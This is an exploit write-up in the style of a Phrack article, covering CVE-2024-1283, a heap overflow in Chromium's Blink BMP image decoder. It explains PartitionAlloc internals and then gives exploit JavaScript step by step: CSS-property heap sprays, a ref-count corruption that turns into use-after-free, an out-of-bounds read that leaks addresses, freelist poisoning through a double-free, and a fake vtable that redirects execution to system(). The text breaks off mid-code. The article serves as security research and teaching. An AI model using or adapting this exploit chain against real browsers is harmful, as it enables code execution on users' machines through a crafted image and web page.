Title : Allocating new exploits
Author : r3tr074
==Phrack Inc.==
Volume 0x10, Issue 0x47, Phile #0x0A of 0x11
|=----------------------------------------------------------------------=|
|=---------------=[ Allocating new exploits ]=----------------=|
|=----------------------------------------------------------------------=|
|=-----------------=[ Pwning browsers like a kernel ]=------------------=|
|=----------=[ Digging into PartitionAlloc and Blink engine ]=----------=|
|=----------------------------------------------------------------------=|
|=----------------------------=[ r3tr074 ]=-----------------------------=|
|=---------------------------=[ [email protected] ]=----------------------------=|
|=----------------------------------------------------------------------=|
"He who fights with monsters might
take care lest he thereby become a
monster. And if you gaze for long
into an abyss, the abyss gazes
also into you."
- Friedrich Nietzsche
---[ Index
0 - Introduction
1 - Chromium rendering engine overview
2 - Case study: BMP 0day
2.1 - Bug power, the primitives
3 - PartitionAlloc, the memory allocator
3.1 - PartitionAlloc security guarantees
4 - Exploitation
5 - Takeaways, advances, etc etc etc
6 - References
7 - Exploit code
---[ 0 - Introduction
This article will try to explain a lot about Chrome, Blink and
PartitionAlloc internals and apply all this knowledge to transform an
extremely restricted bug into arbitrary code execution.
The vulnerability in question is CVE-2024-1283, a heap overflow in the
Blink engine that occurs when decoding BMP images. Using a couple of new
techniques very similar to recent Linux kernel tricks like elastic heap
objects and cross-cache overflow, we can abuse PartitionAlloc and exploit,
in theory, any memory write bug, resulting in full shellcode execution.
---[ 1 - Chromium rendering engine overview
Chromium, and all Chromium-based browsers, use the "Blink rendering
engine" [1]. This component is responsible for much of what happens
within the renderer process, such as parsing HTML, CSS, decoding
images, and more.
"A browser engine (also known as a layout engine or rendering engine)
is a core software component of every major web browser. The primary
job of a browser engine is to transform HTML documents and other
resources of a web page into an interactive visual representation
on a user's device." [2]
Blink is used by Chromium, but is considered a separate library. Its code
can be found within the Chromium source at `src/third_party/blink`, and
its own repository can be found here [3].
Although these tasks are Blink's responsibility, not all of them are
implemented in Blink's own code. For example, a rendering engine must be
able to execute JavaScript, but the JS engine is not part of the main
code.
This is the case with V8, the JavaScript engine used, which lives
separately at `v8/`. It also has its own repository [4]. The same applies
to some image formats [5] and video formats [6]. However, other image
formats are entirely processed by Blink, such as "BMP", "AVIF", and some
others.
We can see them in `src/third_party/blink/renderer/platform/image-decoders`
---[ 2 - Case study: BMP 0day
After spending some time fuzzing these isolated image formats, I was able
to find a very interesting bug, a "heap-overflow" within BMPImageDecoder
(ASAN shows it as if the overflow happened within Skia, resulting in an
incorrect title for the CVE [7]). Let's understand how this bug occurs,
and what its primitives are! We can start by analyzing the
ASAN stack trace:
r3tr0@chrome:~/fuzz/bmp$ cat /tmp/bad.bmp | ./test-crash
==875756==ERROR: AddressSanitizer: heap-buffer-overflow on address[redacted]
READ of size 32 at 0x521000001100 thread T0
#0 0xdead in unsigned int vector[8] skcms_private::hsw::load()
#1 0xdead in skcms_private::hsw::Exec_load_8888_k()
#2 0xdead in skcms_private::hsw::Exec_load_8888()
#3 0xdead in skcms_private::hsw::exec_stages()
#4 0xdead in skcms_private::hsw::run_program()
#5 0xdead in skcms_Transform
#6 0xdead in blink::BMPImageReader::ColorCorrectCurrentRow()
#7 0xdead in blink::BMPImageReader::ProcessRLEData()
#8 0xdead in blink::BMPImageReader::DecodePixelData(bool)
#9 0xdead in blink::BMPImageReader::DecodeBMP(bool)
#10 0xdead in blink::BMPImageDecoder::DecodeHelper(bool)
#11 0xdead in blink::BMPImageDecoder::Decode(bool)
#12 0xdead in blink::ImageDecoder::DecodeFrameBufferAtIndex()
[redacted]
The last function within blink is BMPImageReader::ColorCorrectCurrentRow().
We can see a snippet of this function below:
void BMPImageReader::ColorCorrectCurrentRow() {
...
// address calc here
ImageFrame::PixelData* const row = buffer_->GetAddr(0, coord_.y());
...
const bool success =
skcms_Transform(row, fmt, alpha, transform->SrcProfile(), row, fmt, alpha,
transform->DstProfile(), parent_->Size().width());
DCHECK(success);
buffer_->SetPixelsChanged(true);
}
With a little debugging help, we can conclude that there is an address
calculation error in `buffer_->GetAddr(0, coord_.y());`, where this
function ends up being resolved to this other inline function:
const uint32_t* addr32(int x, int y) const {
SkASSERT((unsigned)x < (unsigned)fInfo.width());
SkASSERT((unsigned)y < (unsigned)fInfo.height());
return (const uint32_t*)((const char*)this->addr32() + (size_t)y * fRowBytes + (x << 2));
}
This function can also be summarized in a single line
`this->addr32() + y * fRowBytes + (x << 2)`.
Somehow `coord_.y()` is equal to -1 in the iteration that causes a crash,
and if we resolve this calculation with this value we can understand why:
this->addr32() + y * fRowBytes + (x << 2);
base_addr + -1 * fRowBytes + (0 << 2);
base_addr - fRowBytes;
Plugging in the values we know: `this->addr32()` is the base address of
the image decoding chunk, y is -1, and x is 0.
Thus, the result is the base address minus fRowBytes, an address that
points before the start of the chunk. The function subsequently called
within Skia then writes into this buffer, since the same pointer is passed
as both input and output. We can treat this like a `memcpy`: the flaw is
not in the function but in what is passed to it.
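The wrap-around in this calculation can be reproduced outside Chromium.
The sketch below models the Skia arithmetic with BigInt and emulates the
64-bit `size_t` cast. The name `addr32Model`, the base address and the row
size are illustrative assumptions, not values taken from the crash.

```javascript
// Model of: (const char*)base + (size_t)y * fRowBytes + (x << 2)
// All arithmetic is done modulo 2^64, as on a 64-bit target.
function addr32Model(base, x, y, rowBytes) {
  const u64 = (v) => BigInt.asUintN(64, v);
  const yAsSizeT = u64(BigInt(y)); // (size_t)-1 == 0xffffffffffffffff
  return u64(base + yAsSizeT * rowBytes + (BigInt(x) << 2n));
}

const demoBase = 0x1180136a400n; // hypothetical start of the decode buffer
const demoRowBytes = 0x400n;     // hypothetical fRowBytes

// Row 0 is the start of the buffer; row -1 lands one row before it.
console.log(addr32Model(demoBase, 0, 0, demoRowBytes).toString(16));
console.log(addr32Model(demoBase, 0, -1, demoRowBytes).toString(16));
```

The second call returns an address exactly `fRowBytes` below the buffer,
which is the pointer that ends up being handed to `skcms_Transform`.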
Looking at the patch [8] makes it clearer why this happens. It's a simple
off-by-one bug, where the `ColorCorrectCurrentRow()` function is called
one more time than expected. Since decoding occurs `top_down`, 1 is
subtracted from y on each iteration; instead of stopping at 0, one more
iteration happens and the extra subtraction turns y into -1.
----[ 2.1 - Bug power, the primitives
Very good, but what kind of primitives does this bug give us? Where and
what can we write? Analyzing the `skcms_Transform` function, it receives
a kind of "bytecodes" for an image transformation VM. The important part
is that we don't control the bytecode sent, only the input buffer, so we
can't control what is written. Let's analyze an example at runtime and
see what happens:
pwndbg> x/6gx $rdi
0x1180136a000: 0x4141414141414141 0x4242424242424242
0x1180136a010: 0x4343434343434343 0x4444444444444444
0x1180136a020: 0x4545454545454545 0xff00ff00ff00ff00
pwndbg> continue
[redacted]
pwndbg> x/6gx 0x1180136a000
0x1180136a000: 0x4100000041000000 0x4200000042000000
0x1180136a010: 0x4300000043000000 0x4400000044000000
0x1180136a020: 0x4500000045000000 0xff00ff00ff00ff00
Basically, we can only write null bytes, with the exception of 0xff bytes,
which are left untouched. The most significant byte of every 4-byte word is
also left untouched. This is a quite limited write primitive, but still a
powerful one.
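To reason about what survives the write, it helps to have a small model of
the effect seen in the debugger output above. This is only a sketch of the
observed behavior (keep the top byte, keep 0xff bytes, zero the rest), not
a reimplementation of skcms; the name `modelWord` is made up for
illustration.

```javascript
// Apply the observed effect to one 32-bit little-endian word:
//  - the most significant byte is kept,
//  - any 0xff byte is kept,
//  - every other byte becomes 0x00.
function modelWord(word) {
  let out = 0;
  for (let i = 0; i < 4; i++) {
    const byte = (word >>> (8 * i)) & 0xff;
    const keep = i === 3 || byte === 0xff;
    if (keep) out |= byte << (8 * i);
  }
  return out >>> 0; // convert back to an unsigned 32-bit value
}

for (const w of [0x41414141, 0xff00ff00, 0x0000ff02]) {
  console.log(w.toString(16).padStart(8, '0'), '->',
              modelWord(w).toString(16).padStart(8, '0'));
}
```

The last sample word shows why a counter such as 0xff02 is interesting:
under this model only its low byte is cleared.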
Now that we know what we can write, let's see where we can write. Going
back to the address calculation, the only variable we haven't talked about
is fRowBytes.
In our case this variable is always 1/4 of the chunk size, which we can
partially control using the height and width of the image. This results
in a partial overflow into the end of the preceding chunk. Assuming the BMP
image chunk has 0x1000 bytes, the last 0x400 bytes of the chunk before it
will be corrupted:
0x400 bytes corrupted
\ /
+---------------------+--------------------+
| |XXXXX| |
| Another chunk |XXXXX| BMP chunk(0x1000) |
| |XXXXX| |
+---------------------+--------------------+
Now everything seems like a lost cause, since we can only write null bytes.
The best idea is to overwrite a `ref_count_` property, but all of them are
located at the beginning of the chunk. To move forward, we need to better
understand how Chromium's custom memory allocator works.
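To make the limitation concrete, the sketch below computes which offsets of
the preceding slot the extra row touches. It assumes slots are packed back
to back with no padding and that fRowBytes is 1/4 of the BMP chunk, as
observed above; `corruptedOffsets` is a hypothetical helper.

```javascript
// Offsets (relative to the start of the preceding slot) overwritten by the
// extra row. Assumes back-to-back slots and fRowBytes == bmpChunkSize / 4.
function corruptedOffsets(neighborSlotSize, bmpChunkSize) {
  const rowBytes = bmpChunkSize / 4;
  const from = Math.max(0, neighborSlotSize - rowBytes);
  return { from, to: neighborSlotSize, coversHeader: from === 0 };
}

// Same-sized neighbor: only its tail is hit, the header at offset 0 is safe.
console.log(corruptedOffsets(0x1000, 0x1000));
// A neighbor no larger than fRowBytes is covered from its first byte.
console.log(corruptedOffsets(0x400, 0x1000));
```

With a same-sized neighbor the write never reaches offset 0, which is why
a header field such as `ref_count_` looks out of reach at this point.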
---[ 3 - PartitionAlloc, the memory allocator
"PartitionAlloc is a memory allocator optimized for space efficiency,
allocation latency, and security." [9] It is developed by Google and used
in Chromium by default.
Quickly, we can highlight the most important things about PartitionAlloc:
- It's a SLAB allocator, which means it pre-allocates memory and
organizes it into fixed-size chunks, which is very important from
a security perspective.
- There's a thread cache, like tcache in glibc heap.
- There are some "soft-protections" against certain types of memory
management bugs, like double-free.
- After freeing a slot, the freelist pointer is written in
big-endian at the beginning of this slot.
>> When exploring a SLAB allocator, similar to the kernel, we expect a
very direct exploitation path. Only objects of the same size are
allocated adjacent to each other. Therefore, the vulnerable object
and the victim must share the same size or similar.
Everything in PartitionAlloc is allocated within "pages", which can be:
- System Page
A page defined by the OS, typically 4KiB; PartitionAlloc supports up to 64KiB.
- Partition Page
Consists of exactly 4 system pages.
- Super Page
A 2MiB region, aligned on a 2MiB boundary.
- Extent
An extent is a run of consecutive super pages.
System Page
^
+------+
| |
+------+
Partition Page
^
+------+------+------+------+
| | | | |
+------+------+------+------+
Super page (2MiB)
^
+-----------------------------------------------------+
| |
+-----------------------------------------------------+
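Because Super Pages are 2MiB-aligned, the page hierarchy boils down to
simple mask arithmetic. The sketch below assumes a 4KiB system page (the
typical value mentioned above); the helper names are illustrative and are
not PartitionAlloc APIs.

```javascript
const kSystemPageSize = 4 * 1024;               // typical value, OS dependent
const kPartitionPageSize = 4 * kSystemPageSize; // exactly 4 system pages
const kSuperPageSize = 2 * 1024 * 1024;         // 2MiB, 2MiB-aligned

// Base of the Super Page that contains `addr` (BigInt address).
function superPageBase(addr) {
  return addr & ~(BigInt(kSuperPageSize) - 1n);
}

// Index of the Partition Page inside its Super Page.
function partitionPageIndex(addr) {
  return Number((addr - superPageBase(addr)) / BigInt(kPartitionPageSize));
}

const sampleAddr = 0x1180136a000n; // address seen in the debugger output
console.log(superPageBase(sampleAddr).toString(16));
console.log(partitionPageIndex(sampleAddr));
console.log(kSuperPageSize / kPartitionPageSize); // partition pages per super page
```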
Within each Super Page, several Partition Pages are allocated, where the
smallest memory units can be divided into:
- Slot: is a single unit chunk
- Slot span: is a run of same-sized chunks
- Bucket: Chains slot spans containing slots of similar size
+-------------------+ +------------------+ +-------------+
|...| PartitionPage | -> | SlotSpanMetadata | -> |freelist_head|
+-------------------+ +------------------+ |-------------|
\ / | bucket |
\ / +-------------+
\ / |
\ / V
+--------------------------------------------------+ +------------------+
| | | | | | | | Partition Bucket |
| Guard | Metadata | Guard | N pages | ... | Guard | +------------------+
| | | | | | |
+--------------------------------------------------+
Super Page
An entire Super Page is laid out as follows. Right at the beginning there
are 3 pages: 2 "Guard Pages", which are pages with PROT_NONE to prevent any
kind of linear corruption, and a Metadata page between them. The Metadata
page holds a list of "Partition Page" structs, which track information
about the Partition Pages. Each one also embeds a SlotSpanMetadata, which,
besides the freelist_head of that span, holds the pointer to its Bucket.
+------------------+
| Partition Bucket |-------+ +----+
+------------------+ | | |
v | v
+--------------------------------------------------+
| | | | | | |
| Guard | Metadata | Guard | N pages | ... | Guard |
| | | | | | |
+--------------------------------------------------+
Each Partition Bucket chains the slot spans that hold slots of its size.
This is a single slot
| +-----------------+
+------->|0x1000|0x1000|...|
|-----------------| -> this is a slot span
|0x1000|0x1000|...|
+-----------------+
\ /
\ /
\ /
\ /
+--------------------------------------------------+
| | | | | | |
| Guard | Metadata | Guard | N pages | ... | Guard |
| | | | | | |
+--------------------------------------------------+
Each Slot Span can be composed of N Partition Pages and holds several
adjacent slots of exactly the same size.
PartitionAlloc also has a per-thread cache. It is built to meet the needs
of most common allocations and avoid performance loss in the central
allocator that requires a context lock to prevent two allocations from
returning the same slot.
"The thread cache has been tailored to satisfy a vast majority of
requests by allocating from and releasing memory to the main allocator
in batches, amortizing lock acquisition and further improving locality
while not trapping excess memory." [10]
----[ 3.1 - PartitionAlloc security guarantees
When looking from a security perspective, PartitionAlloc delivers some
guarantees:
1. Linear overflows/underflows cannot corrupt into, out of, or between
partitions. There are guard pages at the beginning and the end of
each memory region owned by a partition.
2. Linear overflows/underflows cannot corrupt the allocation metadata.
PartitionAlloc records metadata in a dedicated, out-of-line region
(not adjacent to objects), surrounded by guard pages. (Freelist
pointers are an exception.)
3. Partial pointer overwrite of freelist pointer should fault.
4. Direct map allocations have guard pages at the beginning and the end.
5. One page can contain only objects from the same bucket. Even after
this page is completely freed.
If we look closely, guarantees 1 and 2 basically prevent corruptions
against the Metadata Page and overflow between Super Pages. This is the
job of the "Guard Page" mentioned above, a memory page with the PROT_NONE
protection, which will cause a crash when trying to read, write, or
execute anything within that page.
Guarantee 3 simply involves storing the freelist pointer in big-endian
format. A partial overwrite therefore hits the most significant bytes
first, and once the value is converted back to little-endian the result
is a completely different pointer.
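The effect of the byte order is easy to see with a DataView. The sketch
below stores a pointer in both encodings, overwrites the first two bytes in
memory (the ones a linear overflow reaches first) and decodes the value
again. The pointer value and the name `partialOverwrite` are assumptions
for illustration; this does not model any additional checks PartitionAlloc
may perform.

```javascript
// Store a 64-bit pointer into 8 bytes, overwrite the first `n` bytes,
// then decode it with the same byte order it was stored in.
function partialOverwrite(ptr, bigEndian, n, fill = 0x41) {
  const view = new DataView(new ArrayBuffer(8));
  view.setBigUint64(0, ptr, !bigEndian); // third argument is littleEndian
  for (let i = 0; i < n; i++) view.setUint8(i, fill);
  return view.getBigUint64(0, !bigEndian);
}

const slotPtr = 0x000011801236a000n; // hypothetical slot address

// Little-endian storage: only the low bytes change, the result stays nearby.
console.log(partialOverwrite(slotPtr, false, 2).toString(16));
// Big-endian storage: the high bytes change, the result is far away.
console.log(partialOverwrite(slotPtr, true, 2).toString(16));
```

In the big-endian case the decoded value has garbage in its top 16 bits,
which is not a canonical user-space address on x86-64, so using it faults.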
Guarantee 4 is just a variation of guarantees 1 and 2, where, if it is
necessary to allocate a very large chunk that does not fit into a common
Super Page, this memory is allocated directly by mapping memory. This
mapped memory is again placed between two "Guard Pages", one at
the beginning and one at the end.
Finally, guarantee 5 is useful against type confusion attacks and attempts
to abuse a UAF between pages.
So, if you paid attention, there are no guarantees or protections that
prevent two buckets of completely different sizes from being allocated
adjacent to each other without any kind of red zone between them (as is
the case of Guard Pages between Super Pages). Therefore, it is entirely
possible and stable to create this layout:
vuln obj size=0x1000 victim obj size=0x4000
+----------+ +----------+
| ... | | victim |
|----------| |----------|
| vuln | | ... |
+----------+ +----------+
\ \ / /
\ \ / /
\ \ / /
\ \/ /
+---------------------------------------------------+
| | | | | | | |
| G | M | G | 2 pages | 3 pages | ...N pages | G |
| | | | | | | |
+---------------------------------------------------+
Testing the hypothesis, I could verify that we can create extremely stable
memory layouts in which objects of the same type but different sizes are
adjacent to each other.
---[ 4 - Exploitation
With the possibility of overflowing into any other slot of a different
size, we just need to find an interesting target. We could search for an
object with a |length_| property, but since we can only write null bytes,
I believe we can take more advantage of the bug by attacking a
|ref_count_| property. Looking for references of good targets, we can
follow existing work used to exploit the well-known "The WebP 0day" [11].
Objects and structures in CSS are allocated by Blink itself. Among these
objects is CSSVariableData, which represents the value of variables within
CSS [12]. It seems to be a great target for several reasons:
- It's an elastic object, so we can force it to fit in our case or any
other; this object can vary in size between 16 bytes and
2097152 bytes (`kMaxVariableBytes`).
- It's a "ref counted" object.
- It doesn't have any pointers that could cause a crash when
dereferenced.
In `css_variable_data.h`, we can see the description of the object:
class CORE_EXPORT CSSVariableData : public RefCounted<CSSVariableData> {
...
private:
...
// 32 bits refcount before this.
// We'd like to use bool for the booleans, but this causes the struct to
// balloon in size on Windows:
// https://randomascii.wordpress.com/2010/06/06/bit-field-packing-with-visual-c/
// Enough for storing up to 2MB (and then some), cf. kMaxSubstitutionBytes.
// The remaining 4 bits are kept in reserve for future use.
const unsigned length_ : 22;
const unsigned is_animation_tainted_ : 1; // bool.
const unsigned needs_variable_resolution_ : 1; // bool.
const unsigned is_8bit_ : 1; // bool.
unsigned has_font_units_ : 1; // bool.
unsigned has_root_font_units_ : 1; // bool.
unsigned has_line_height_units_ : 1; // bool.
const unsigned unused_ : 4;
In memory, this object reflects this layout:
0 4 8 16
+------------+----------+-+-------------------------+
| ref_count_ | length_ |F| String content |
+------------+----------+-+-------------------------+
| String content... |
+---------------------------------------------------+
> F = flags
And the code that allocates this object can be found in the same file:
// third_party/blink/renderer/core/css/css_variable_data.h:34
static scoped_refptr<CSSVariableData> Create(StringView original_text,
bool is_animation_tainted,
bool needs_variable_resolution,
bool has_font_units,
bool has_root_font_units,
bool has_line_height_units) {
if (original_text.length() > kMaxVariableBytes) {
// This should have been blocked off during variable substitution.
NOTREACHED();
return nullptr;
}
wtf_size_t bytes_needed =
sizeof(CSSVariableData) + (original_text.Is8Bit()
? original_text.length()
: 2 * original_text.length());
void* buf = WTF::Partitions::FastMalloc(
bytes_needed, WTF::GetStringWithTypeName<CSSVariableData>());
return base::AdoptRef(new (buf) CSSVariableData(
original_text, is_animation_tainted, needs_variable_resolution,
has_font_units, has_root_font_units, has_line_height_units));
}
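The size computation in `Create()` is what makes the object elastic, so it
is worth mirroring it in JS when planning a spray. The sketch below assumes
an 8-byte header (4-byte `ref_count_` plus the 4-byte bitfield, as in the
layout diagram above) and approximates `Is8Bit()` by checking that every
code unit fits in Latin-1; both are assumptions, and Blink's real string
representation may differ.

```javascript
const kHeaderSize = 8; // assumption: 4-byte ref_count_ + 4-byte bitfield

// Rough stand-in for StringView::Is8Bit(): true if every code unit <= 0xff.
function is8Bit(text) {
  for (let i = 0; i < text.length; i++) {
    if (text.charCodeAt(i) > 0xff) return false;
  }
  return true;
}

// Mirrors the bytes_needed expression in CSSVariableData::Create().
function bytesNeeded(text) {
  return kHeaderSize + (is8Bit(text) ? text.length : 2 * text.length);
}

console.log(bytesNeeded('C'.repeat(0x1fcc)).toString(16)); // 8-bit string
console.log(bytesNeeded('\u4e2d\u6587'));                  // 16-bit string
```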
Well, it seems like a great target, but now we need to discuss which
bucket this object will be allocated in. Due to the thread cache, the
objects won't be placed together. We need to force the thread cache to
clear the bucket so that our vulnerable object and victim share the same
Super Page. Luckily, this is quite simple to do. We just need to fill the
cache up to the "limit", as can be seen in this comment:
// base/allocator/partition_allocator/src/partition_alloc/thread_cache.cc:586
// For each bucket, there is a |limit| of how many cached objects there are in
// the bucket, so |count| < |limit| at all times.
// - Clearing: limit -> limit / 2
// - Filling: 0 -> limit / kBatchFillRatio
The code that executes this subroutine can be seen below:
// base/allocator/partition_allocator/src/partition_alloc/thread_cache.h:511
PA_ALWAYS_INLINE bool ThreadCache::MaybePutInCache(uintptr_t slot_start,
size_t bucket_index,
size_t* slot_size) {
PA_REENTRANCY_GUARD(is_in_thread_cache_);
...
auto& bucket = buckets_[bucket_index];
...
uint8_t limit = bucket.limit.load(std::memory_order_relaxed);
// Batched deallocation, amortizing lock acquisitions.
if (PA_UNLIKELY(bucket.count > limit)) {
ClearBucket(bucket, limit / 2);
}
...
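The clearing rule can be modeled in a few lines to predict how many frees
are needed before slots go back to the central allocator. This is a
simplified sketch: it assumes the freed slot is pushed into the bucket
before the limit check, and it does not model which slots are flushed
first. `BucketModel` is a hypothetical name, not a PartitionAlloc class.

```javascript
// Toy model of one thread-cache bucket with the "limit -> limit / 2" rule.
class BucketModel {
  constructor(limit) {
    this.limit = limit;
    this.cached = [];  // slots held by the thread cache
    this.central = []; // slots handed back to the central allocator
  }
  free(slot) {
    this.cached.push(slot);
    if (this.cached.length > this.limit) {
      this.clear(Math.floor(this.limit / 2));
    }
  }
  clear(target) {
    while (this.cached.length > target) {
      this.central.push(this.cached.pop());
    }
  }
}

const bucket = new BucketModel(8); // the limit value is an arbitrary example
for (let i = 0; i < 9; i++) bucket.free(i);
console.log(bucket.cached.length, bucket.central.length);
```

In this model the ninth free pushes the count past the limit, so the
bucket is trimmed to half the limit and the rest returns to the central
allocator, where it can be reused for the layout.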
Now let's create this layout with JS. How can we manipulate these objects
to create a perfect layout?
First, let's force the allocation of a new Super Page to have more
control. For this, we can simply do several sprays:
let div0 = document.getElementById('div0');
for (let i = 0; i < 30; i++) {
div0.style.setProperty(`--sprayA${i}`, kCSSString);
div0.style.setProperty(`--sprayC${i}`, kCSSStringCross0x2000);
div0.style.setProperty(`--sprayB${i}`, kCSSStringHRTF);
}
After that, let's force object A to be adjacent to C. Object B should be
allocated close, but not adjacent to, the others as it will be useful for
acquiring memory leaks.
for (let i = 0; i < 50; i++) {
for (let j = 0; j < 4; j++) {
// spraying allocation of 2 different size spans
// very close to 100% of attempts, the same object is allocated
// after a different sized slot
const CSSValName = `${i}.${j}`.padEnd(0x7fcc, 'A');
div0.style.setProperty(`--a${i}.${j}`, CSSValName);
const CSSValName2 = `${i}.${j}`.padEnd(0x1fcc, 'C');
div0.style.setProperty(`--c${i}.${j}`, CSSValName2);
}
for (let j = 0; j < 64; j++) {
const CSSValName = `${i}.${j}`.padEnd(0x414, 'B');
div0.style.setProperty(`--b${i}.${j}`, CSSValName);
}
}
And finally, let's clear the bucket to finish preparing our layout:
for (let i = 10; i < 30; i++) {
div0.style.removeProperty(`--a${i}.2`);
}
for (let i = 46; i > 20; i--) {
div0.style.removeProperty(`--c${i}.0`);
}
gc(); await sleep(500);
Now, after creating the correct heap layout, we will overwrite the
`ref_count_`, trigger a free, and allocate a fully controllable data
object over the victim object, thus creating a UAF condition.
We can abuse our conditional writing of null bytes. Recall that 0xff
bytes are left untouched, so we can increase the `ref_count_` to
`0xff01` and trigger the vulnerability. After this, the ref count will
be `0xff00`, and calling `gc();` will free this object while we still
have an active reference.
>> Remember: the `ref_count_` actually starts at 2, so we need to
increase it to `0xff02`; otherwise the ref_count will reach -1
and cause a crash.
+------------+----------+-+-------------------------+
| 2 | 0x2000 |F| "AAAAAAAAAAAA" |
+------------+----------+-+-------------------------+
| "AAAAAAAAAAAA..." |
+---------------------------------------------------+
|
| increase `ref_count_` (+0xff00)
|
v
+------------+----------+-+-------------------------+
| 0xff02 | 0x2000 |F| "AAAAAAAAAAAA" |
+------------+----------+-+-------------------------+
| "AAAAAAAAAAAA..." |
+---------------------------------------------------+
|
| Trigger vuln
|
v
+------------+----------+-+-------------------------+-------------------+
| 0xff00 | 0x0000 |F| "A\x00\x00\x00" | |
+------------+----------+-+-------------------------+ BMP vuln chunk... |
| "A\x00\x00\x00..." | |
+---------------------------------------------------+-------------------+
|
| Call `gc();` and decrease
| `ref_count_` (-0xff00)
v
+-------------------------+-------------------------+
| freelist ptr | "A\x00\x00\x00" |
+-------------------------+-------------------------+
| "A\x00\x00\x00..." |
+---------------------------------------------------+
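The bookkeeping behind this diagram is plain arithmetic. The sketch below
assumes that `gc()` ends up releasing exactly the references that were
added on top of the initial ones; that is my reading of the steps above,
not something verified against Blink, and `simulateRefcount` is a
hypothetical helper.

```javascript
// baseRefs:       references that exist before we start (2 in the article)
// targetCount:    value ref_count_ is raised to before the overflow
// corruptedCount: value left in memory by the overflow
function simulateRefcount(baseRefs, targetCount, corruptedCount) {
  const extraRefs = targetCount - baseRefs; // references added on top
  const stored = corruptedCount - extraRefs; // after the extras are released
  const freed = stored === 0;
  return { stored, freed, danglingRefs: freed ? baseRefs : 0 };
}

console.log(simulateRefcount(2, 0xff02, 0xff00));
```

Under these assumptions the counter reaches zero while the two original
references are still alive, which is the use-after-free condition.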
Perfect! We can use any object to consume this freelist entry and overwrite
the |length_| property. For this, we will use an AudioArray that we can
control entirely. AudioArray is also an elastic object that has been used
to exploit another type of UAF previously [13].
Now we can OOB read:
fetch("/bad.bmp").then(async response => {
let rs = getComputedStyle(div0);
let imageDecoder = new ImageDecoder({
data: response.body,
type: "image/bmp"
});
increase_refs(0xff02); // overflow will overwrite 0xff02 to 0xff00
imageDecoder.decode().then(async () => {
gc(); gc();
await sleep(2500);
let ab = new ArrayBuffer(0x600);
let view = new Uint32Array(ab);
// fake CSSVariableData
view[0] = 1; // ref_count
const newCSSVarLen = 0x19000;
view[1] = newCSSVarLen | 0x01000000; // length and flags, set is_8bit_
for (let i = 2; i < view.length; i++)
view[i] = i;
await allocAudioArray(0x2000, ab, 1);
leak();
})
});
async function leak() {
console.log("continuing...");
let div0 = document.getElementById('div0');
let rs = getComputedStyle(div0);
let CSSLeak = rs.getPropertyValue(kTargetCSSVar).substring(0x15000 - 8);
console.log(CSSLeak.length.toString(16));
...
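The constant `newCSSVarLen | 0x01000000` written into the fake object
follows from the bitfield declaration shown earlier. The sketch below
decodes such a word, assuming bitfields are allocated starting from the
least significant bit (the usual layout for Clang and GCC on x86-64);
`unpackHeaderWord` is an illustrative helper.

```javascript
const kLengthBits = 22;
const kLengthMask = (1 << kLengthBits) - 1;

// Decode the 32-bit word that follows ref_count_ in CSSVariableData.
function unpackHeaderWord(word) {
  return {
    length: word & kLengthMask,                          // bits 0..21
    isAnimationTainted: Boolean(word & (1 << 22)),       // bit 22
    needsVariableResolution: Boolean(word & (1 << 23)),  // bit 23
    is8Bit: Boolean(word & (1 << 24)),                   // bit 24
  };
}

console.log(unpackHeaderWord(0x19000 | 0x01000000));
```

The fake header therefore advertises an 8-bit string of 0x19000 bytes,
far larger than the slot that actually backs it.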
Good, but not enough. We've defeated ASLR, but now we need a way to
hijack control flow. Instead of looking for more good victim objects, we
can directly attack PartitionAlloc again and corrupt the freelist pointer.
The idea is to create a double-free condition, which will result in a
circular freelist and ultimately let us overwrite the pointer.
CSSVariableData and AudioArray essentially point to the same address, so
we can cause both of them to be freed, which is a "double-free". If we do
this, the freelist pointer written in the chunk will point to itself:
+----------+
| | It's pointing at itself
| v
| +-------------------------+-------------------------+
+----| freelist ptr | "A\x00\x00\x00" |
+-------------------------+-------------------------+
| "A\x00\x00\x00..." |
+---------------------------------------------------+
This circular freelist is extremely powerful, because we can use the same
AudioBuffer as before to corrupt the freelist pointer. The next allocation
request will return the pointer we want, giving us an arbitrary write.
+----------+
| | It's pointing at itself
| v
| +-------------------------+-------------------------+
+----| freelist ptr | "A\x00\x00\x00" |
+-------------------------+-------------------------+
| "A\x00\x00\x00..." |
+---------------------------------------------------+
|
| Alloc an AudioArray and corrupt freelist
|
v
+-------------------------+-------------------------+
| corrupted ptr | "A\x00\x00\x00" |
+-------------------------+-------------------------+
| "A\x00\x00\x00..." |
+---------------------------------------------------+
The only restriction for the corrupted pointer is that it must be
within the same Super Page. To achieve code execution, we will deallocate
object B and allocate objects that have vtables, then corrupt the
freelist to point to one of these objects. This way, we can corrupt the
vtable pointer and easily hijack control flow. The following snippet of
the exploit allocates the vtable objects and leaks their addresses:
CSSVars = [
// this regex is used to find the B objects in memory
// the pattern matches: ref_count_ (2) + length_ (0x414) with flags
// + "${i}.${j}" + "BBBBB..."
...CSSLeak.matchAll(/\x02\x00\x00\x00\x14\x04\x00\x01(\d+\.\d+)/g)
];
...
for (let i = 0; i < kSprayPannerCount; i++) {
panners.push(audioCtx.createPanner());
}
for (let i = 0; i < kSprayPannerCount; i++) {
// I'm not sure why, but I need to bump the ref_count_ and then remove
// the prop to trigger the free
rs.getPropertyValue(`--b${CSSVars[i][1]}`);
div0.style.removeProperty(`--b${CSSVars[i][1]}`);
}
gc(); gc(); await sleep(1000);
for (let i = 0; i < panners.length; i++) {
// allocating objects with vtables
panners[i].panningModel = 'HRTF';
}
// free two panners after target CSSVariableData
panners[kSprayPannerCount - 2].panningModel = 'equalpower';
panners[kSprayPannerCount - 1].panningModel = 'equalpower';
await sleep(1000);
let hrtfLeak = rs.getPropertyValue(kTargetCSSVar).substring(0x15000 - 8);
And now just create the fake vtable and profit!!
let ab = new ArrayBuffer(0x600);
let abFakeObj = new ArrayBuffer(0x600);
let view = new BigUint64Array(ab);
let viewFakeObj = new DataView(abFakeObj);
view[0] = swapEndian(fakePannerAddr - 0x10n);
for (let i = 0; i < viewFakeObj.byteLength; i++)
viewFakeObj.setUint8(i, 0x4a); // "J"
const system_addr = chromeBase + kSystemLibcOffset;
// call qword ptr [rax + 8]
viewFakeObj.setBigUint64(0x0, fakePannerAddr + 8n - 8n, true);
// viewFakeObj.setBigUint64(8, 0xdeadbeefn, true);
viewFakeObj.setBigUint64(0x8, chromeBase + kWriteListenerOffset, true);
// fake BindState addr
viewFakeObj.setBigUint64(0x10, fakePannerAddr + 0x18n, true);
// start of fake BindState
// The first int64 is the value that will be passed to the function
// whose address is in the second int64
viewFakeObj.setBigUint64(0x18 + 0,
// 0x636c616378 == xcalc
